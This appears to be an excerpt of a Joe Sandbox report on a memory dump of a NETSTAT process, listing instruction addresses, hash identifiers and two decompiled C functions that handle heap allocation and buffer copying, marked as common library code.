0x02e92284
0x02e92284
0x02e921a6
0x02e921a9
0x02e921ac
0x02e921ae
0x02e921b3
0x02e9228b
0x02e92290
0x02e92379
0x02e92296
0x02e92298
0x02e92298
0x02e92290
0x02e921b9
0x02e921be
0x02e922a2
0x02e922a2
0x02e921c4
0x02e921c8
0x02e921cc
0x02e921d0
0x02e921d4
0x02e921de
0x02e921e3
0x02ed5a29
0x02ed5a2c
0x00000000
0x00000000
0x02ed5a3b
0x00000000
0x02e921e9
0x02e921e9
0x02e921e9
0x02e921ee
0x02e921f1
0x02ed5a45
0x02ed5a4b
0x02ed5a52
0x02ed5a58
0x02ed5a5d
0x02ed5a5f
0x02ed5a71
0x02ed5a61
0x02ed5a6a
0x02ed5a6a
0x02ed5a76
0x02ed5a79
0x02ed5a7f
0x02ed5a83
0x02ed5a85
0x02ed5a87
0x02ed5a87
0x02ed5a8c
0x02ed5a91
0x02ed5a97
0x02ed5a9f
0x02ed5aa0
0x02ed5aa1
0x02ed5aa6
0x02ed5aab
0x02ed5ab1
0x02ed5ab3
0x02ed5ab9
0x02ed5aca
0x02ed5ad4
0x02ed5ad4
0x02ed5ade
0x02ed5ade
0x02ed5aab
0x02ed5a79
0x02ed5a52
0x02e921f7
0x02e921f9
0x02e921fe
0x02e921fe
0x02e921e3
0x02e92195
0x02e9236c
0x02e92122
0x02e92122
0x02e92124
0x02e92231
0x02e92236
0x02e92236
0x02e92238
0x02e92238
0x02e92240
0x02e92242
0x02e92244
0x02ed59fc
0x02e9218c
0x02e9218c
0x00000000
0x02e9218c
0x02e9224a
0x02e9224f
0x02e92256
0x02e92304
0x02e92309
0x02e9230f
0x02e9231e
0x02e9231e
0x02e9231e
0x02e92320
0x02e92325
0x02e9232a
0x02e9232c
0x02e9233e
0x02e9233e
0x00000000
0x02e9232c
0x02e92311
0x02e92317
0x02e9231a
0x02e9231c
0x02e92380
0x02e92380
0x02e92380
0x02e92384
0x00000000
0x00000000
0x02e92386
0x00000000
0x02e9231c
0x02e9225c
0x02e9225c
0x00000000
0x02e9225c
0x02e9212a
0x02e92134
0x02e92138
0x02e9213d
0x02ed5858
0x02ed5863
0x02ed5863
0x02ed5867
0x02ed586a
0x00000000
0x00000000
0x02ed586c
0x02ed586c
0x02ed5871
0x02ed5875
0x02ed5877
0x02ed5997
0x02ed599c
0x02ed59a1
0x02ed59a7
0x02ed59a7
0x00000000
0x02ed59a7
0x02ed587d
0x00000000
0x02ed588b
0x02ed588b
0x02ed5890
0x02ed5892
0x02ed5894
0x02ed5899
0x02ed589b
0x02ed58a0
0x02ed58a0
0x02ed58aa
0x02ed58b2
0x02ed58b6
0x02ed58be
0x02ed58c6
0x02ed58c9
0x02ed590d
0x02ed5917
0x02ed591a
0x02ed591c
0x02ed5920
0x02ed5928
0x02ed592a
0x02ed592c
0x02ed592e
0x02ed592e
0x02ed58cb
0x02ed58cd
0x02ed58d8
0x02ed58e0
0x02ed58f4
0x02ed58fe
0x02ed58fe
0x02ed593a
0x02ed593e
0x02ed5940
0x02ed5942
0x00000000
0x02ed5944
0x02ed5944
0x02ed5949
0x02ed594e
0x02ed594e
0x02ed5953
0x02ed595b
0x02ed5976
0x02ed5976
0x02ed597a
0x02ed597f
0x00000000
0x00000000
0x00000000
0x00000000
0x02ed5981
0x02ed5981
0x02ed5981
0x02ed5983
0x02ed5988
0x02ed598d
0x02ed5991
0x02ed5991
0x00000000
0x02ed595d
0x02ed595d
0x02ed5963
0x02ed5965
0x00000000
0x00000000
0x00000000
0x00000000
0x02ed5967
0x02ed5967
0x02ed596b
0x02ed596d
0x00000000
0x00000000
0x02ed596f
0x02ed5971
0x02ed5971
0x02ed5974
0x00000000
0x00000000
0x00000000
0x02ed5974
0x00000000
0x02ed5967
0x02ed595b
0x02ed5942
0x02ed5863
0x02e92143
0x02e92143
0x02e92149
0x02e9214f
0x02e922ec
0x02e922f1
0x02e922f6
0x00000000
0x02e922f6
0x02e92159
0x02e92173
0x02e92173
0x02e9217d
0x02e92181
0x02e92186
0x02ed59ae
0x02ed59b2
0x02ed59b5
0x02ed59b7
0x02ed59ba
0x02ed59cd
0x02ed59d1
0x02ed59d5
0x02ed59d9
0x02ed59db
0x00000000
0x00000000
0x02ed59dd
0x02ed59dd
0x02ed59e1
0x02ed59e4
0x02ed59e7
0x02ed59ee
0x02ed59ee
0x02ed59f3
0x02ed59f3
0x00000000
0x02e92186
0x02e92164
0x02e9216d
0x00000000
0x00000000
0x00000000
0x02e9216d
0x02e92106
0x02e92266
0x02e920d8
0x02e920da
0x02e920e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fea1dc1f80335fc86964056d045067344f932addbf67568126797c41ec11830c
Instruction ID: dbef991f5af90c0ae2675bf6a1691f4bec16f974dbe2e2fdeafde63b0e908f0d
Opcode Fuzzy Hash: fea1dc1f80335fc86964056d045067344f932addbf67568126797c41ec11830c
Instruction Fuzzy Hash: 34F1D531A88341AFDF25CB29C4407AA7BE5AF85358F04E51EFE999B280D735D841CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02E7849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E02E7849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x2f3f9c0);
				E02EBD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x2f57b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E02E7CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E02E82280( *[fs:0x30], 0x2f58550);
						_t139 =  *0x2f57b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E02E9F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E02E7FFB0(_t193, _t235, 0x2f58550);
								L5:
								return E02EBD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E02E61C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x2f57b9c; // 0x0
							_t235 = L02E84620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x2f57b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E02E9A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E02E7FFB0(_t193, _t235, 0x2f58550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L02E877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L02E877F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x2f57b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x2f57b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E02EA37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x2f57b9c; // 0x0
									_t214 = L02E84620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E02EA37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x2f57b10 =  *0x2f57b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x2f57b04 =  *0x2f57b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L02E877F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L02E877F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x2f57b08 =  *0x2f57b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E02EA57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E02EAF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L02E877F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E02E9A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L02E877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E02EA96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x02e7849b
0x02e7849b
0x02e7849b
0x02e7849b
0x02e7849d
0x02e784a2
0x02e784a7
0x02e784b1
0x02e784d8
0x00000000
0x02e784b3
0x02e784c4
0x02e784c9
0x02e784cd
0x02e784cf
0x02e784cf
0x02e784d6
0x02e784e6
0x02e784e9
0x02e784ec
0x02e784ef
0x02e784f2
0x02e784f4
0x02e784fc
0x02e78501
0x02e78506
0x02e78509
0x02e786e0
0x02e786e5
0x02e786e8
0x02e786ed
0x02e786f0
0x02e786f2
0x02ec9afd
0x02ec9b02
0x02e784da
0x02e784df
0x02e784df
0x02e786fa
0x02e786fd
0x02e786fe
0x02e78701
0x02e78706
0x02e78709
0x02e7870b
0x00000000
0x00000000
0x02e78711
0x02e78725
0x02e78727
0x02e7872a
0x02e7872c
0x02ec9af0
0x02ec9af5
0x02e78732
0x02e78732
0x02e78732
0x02e78735
0x02e78737
0x02e78515
0x02e78515
0x02e78518
0x02e7851d
0x02e78523
0x02e78527
0x02e7852b
0x02e78537
0x02e78539
0x02e7853c
0x02e7853e
0x02e7868c
0x02e78691
0x02e78699
0x02e7869b
0x02e78744
0x02e78748
0x02e786a1
0x02e786a1
0x02e786a1
0x02e786a4
0x02e786a8
0x02ec9bdf
0x02ec9bdf
0x02e786ae
0x02e786b0
0x00000000
0x02e786b6
0x00000000
0x02ec9be9
0x02e786b0
0x02e78544
0x02e7854a
0x02e7854d
0x02e78551
0x02e7876e
0x02e78778
0x02e7877b
0x02e78780
0x02e78557
0x02e78557
0x02e7855d
0x02e7855d
0x02e7856b
0x02e7856e
0x02e78570
0x02e78573
0x02e78576
0x02e78576
0x02e78579
0x02e7857b
0x00000000
0x00000000
0x02e78581
0x02e785a0
0x02e785a2
0x02e785a5
0x02e785a7
0x02ec9b1b
0x02ec9b1b
0x02e7862e
0x02e7862e
0x02e78631
0x02e78631
0x02e78634
0x02e78636
0x02e78669
0x02e78669
0x02e7866b
0x02ec9bbf
0x02ec9bc4
0x02ec9bc8
0x02ec9bce
0x02ec9bce
0x02e78671
0x02e78671
0x02e78674
0x02e78676
0x02ec9bae
0x02ec9bae
0x02e78676
0x02e7867c
0x02e7867e
0x02e78688
0x02e78688
0x00000000
0x02e7867e
0x02e78638
0x02e78638
0x02e7863b
0x02e7863e
0x02e7863f
0x02e78642
0x02e78645
0x02e78648
0x02e7864d
0x02ec9b69
0x02ec9b6e
0x02ec9b7b
0x02ec9b81
0x02ec9b85
0x02ec9b89
0x02ec9ba7
0x02ec9b8b
0x02ec9b91
0x02ec9b9a
0x02ec9b9f
0x02ec9b9f
0x02e78788
0x02e7878d
0x02e78763
0x02e78763
0x02e78766
0x00000000
0x02e78766
0x02ec9b70
0x00000000
0x02ec9b70
0x02e78656
0x02e7865a
0x02e7865c
0x02e78752
0x02e78756
0x00000000
0x00000000
0x02e7875e
0x00000000
0x02e7875e
0x02e78662
0x02e78662
0x02e78662
0x02e78666
0x00000000
0x02e78666
0x02e785b7
0x02e785b9
0x02e785bc
0x02e785bf
0x02e785cc
0x02e785d1
0x02e785d4
0x02e785db
0x02e785de
0x02e785e0
0x02ec9b5f
0x00000000
0x02ec9b5f
0x02e785e6
0x02e785ea
0x02e786c3
0x02e786c5
0x02e786c8
0x02e786ca
0x02ec9b16
0x00000000
0x02ec9b16
0x02e786d6
0x02e785f6
0x02e785f6
0x02e785f9
0x02e78602
0x02e78606
0x02e7860a
0x02e7860b
0x02e7860e
0x02e78611
0x00000000
0x02e78611
0x02e785f3
0x00000000
0x02e785f3
0x02e78619
0x02e7861e
0x02e7861e
0x02e78621
0x02e78622
0x02e78623
0x02e78625
0x02e7862c
0x00000000
0x02e7873d
0x00000000
0x02e7873d
0x02e78737
0x02e7850f
0x02e78512
0x00000000
0x02e78512
0x00000000
0x02e784d6

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e8f693548f223d14c8aa5d4b77d132ac1c926e6b8be3f0ad5b4b62aea5a659
Instruction ID: 0ff7e5660115cf1907cae905740e3e6ee944c6bc54b3dbfe824a6e8ec06c0f11
Opcode Fuzzy Hash: c7e8f693548f223d14c8aa5d4b77d132ac1c926e6b8be3f0ad5b4b62aea5a659
Instruction Fuzzy Hash: EDB16C74E40249EFDB18DFE8C994AADFBB6BF54308F109129E505AB345D770A841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02E9513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E02E9513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x2f5d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E02EAD0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E02E82280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L02E84620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E02EAF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E02E7FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x2f5b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E02EAB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x02e95142
0x02e9514c
0x02e95150
0x02e95157
0x02e95159
0x02e9515e
0x02e95165
0x02e95169
0x02e9516c
0x02e95172
0x02e95176
0x02e9517a
0x02e9517a
0x02e9517a
0x02e9517f
0x02ed6d8b
0x02ed6d8e
0x02ed6d91
0x02ed6d95
0x02ed6d98
0x02ed6d9c
0x02ed6da0
0x02ed6da3
0x02ed6da7
0x02ed6e26
0x02ed6e26
0x02ed6e2a
0x02e951f9
0x02e951f9
0x02e951fe
0x02ed6e33
0x02ed6e33
0x02ed6e39
0x02ed6e3d
0x02ed6e46
0x02ed6e50
0x00000000
0x00000000
0x02ed6e52
0x02ed6e53
0x02ed6e56
0x02ed6e5d
0x00000000
0x00000000
0x00000000
0x02ed6e5f
0x02ed6e67
0x02ed6e77
0x02ed6e7f
0x02ed6e80
0x02ed6e88
0x02ed6e90
0x02ed6e9f
0x02ed6ea5
0x02ed6ea9
0x02ed6eb1
0x02ed6ebf
0x00000000
0x00000000
0x02ed6ecf
0x02ed6ed3
0x00000000
0x00000000
0x02ed6edb
0x02ed6ede
0x02ed6ee1
0x02ed6ee8
0x02ed6eeb
0x02ed6eed
0x02ed6ef0
0x02ed6ef4
0x02ed6ef8
0x02ed6efc
0x00000000
0x00000000
0x02ed6f0d
0x02ed6f11
0x02ed6f32
0x02ed6f37
0x02ed6f3b
0x02ed6f3e
0x02ed6f41
0x02ed6f46
0x00000000
0x00000000
0x02ed6f4c
0x02ed6f50
0x02ed6f50
0x02ed6f54
0x02ed6f62
0x02ed6f65
0x02ed6f6d
0x02ed6f7b
0x02ed6f7b
0x02ed6f93
0x02ed6f98
0x02ed6fa0
0x02ed6fa6
0x02ed6fb3
0x02ed6fb6
0x02ed6fbf
0x02ed6fc1
0x02ed6fd5
0x02ed6fda
0x02ed6fda
0x02ed6fdd
0x02ed6fe2
0x02ed6fe7
0x02ed6feb
0x02ed6fef
0x02ed6ff3
0x02e9520c
0x02e9520c
0x02e9520f
0x02e95215
0x02e95234
0x02e9523a
0x02e9523a
0x02e95244
0x02e95245
0x02e95246
0x02e95251
0x02e95251
0x02ed6f13
0x02ed6f17
0x02ed6f17
0x02ed6f18
0x02ed6f1b
0x02ed6f1f
0x02ed6f23
0x00000000
0x02ed6f28
0x02e95204
0x02e95204
0x02e95208
0x00000000
0x02e95208
0x02e95185
0x02e95188
0x02e9518a
0x02e9518e
0x02e95195
0x02ed6db1
0x02ed6db5
0x02ed6db9
0x02e9519b
0x02e9519b
0x02e9519e
0x02e951a7
0x02e951a9
0x02e951a9
0x02e951b5
0x02e951b8
0x02e951bb
0x02e951be
0x02e951c1
0x02e951c5
0x02e951c9
0x02e951cd
0x02e951cd
0x02e951d8
0x02e951dc
0x02e951e0
0x02ed6dcc
0x02ed6dd0
0x02ed6dd5
0x02ed6ddd
0x02ed6de1
0x02ed6de1
